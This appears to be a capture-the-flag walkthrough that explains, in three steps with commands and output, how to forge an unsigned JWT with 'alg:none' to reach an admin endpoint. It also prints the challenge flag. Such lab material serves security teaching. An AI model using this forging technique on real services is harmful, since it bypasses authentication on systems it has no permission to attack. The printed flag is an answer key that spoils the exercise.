HACKR.GG
hackr.gg — TokenForge — Algorithm None Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

TokenForge — Algorithm None

JWT Attacks · JWT Algorithm None
Difficulty
Beginner
Vuln class
JWT Algorithm None
Steps
3
// Objective
Forge a JWT with alg:none and an admin payload to bypass authentication.
// Tools required
BrowserBurp Suitejwt_toolbase64
// Step-by-step walkthrough
1
Capture a valid JWT
Log in as a regular user and capture the JWT from the Authorization header or cookie. Decode the payload section (base64url decode the middle part).
Command / Input
base64 -d <<< eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoidXNlciJ9
Output
{"user":"guest","role":"user"}
2
Forge an admin token with alg:none
Create a new JWT with the header {"alg":"none","typ":"JWT"}, an admin payload, and an empty signature. Base64url-encode header and payload, join with dots, add trailing dot for empty signature.
Command / Input
python3 -c " import base64, json h = base64.urlsafe_b64encode(json.dumps({'alg':'none','typ':'JWT'}).encode()).rstrip(b'=').decode() p = base64.urlsafe_b64encode(json.dumps({'user':'admin','role':'admin'}).encode()).rstrip(b'=').decode() print(f'{h}.{p}.')"
Output
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
3
Access the admin endpoint
Send the forged token to the protected admin route.
Command / Input
curl http://TARGET/api/admin -H "Authorization: Bearer FORGED_TOKEN"
Output
{"flag":"HackrGG{jwt_n0n3_4lg_byp4ss}"}
// Flag
Flag value
HackrGG{jwt_n0n3_4lg_byp4ss}
Returned by /api/admin when the forged alg:none token is accepted.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute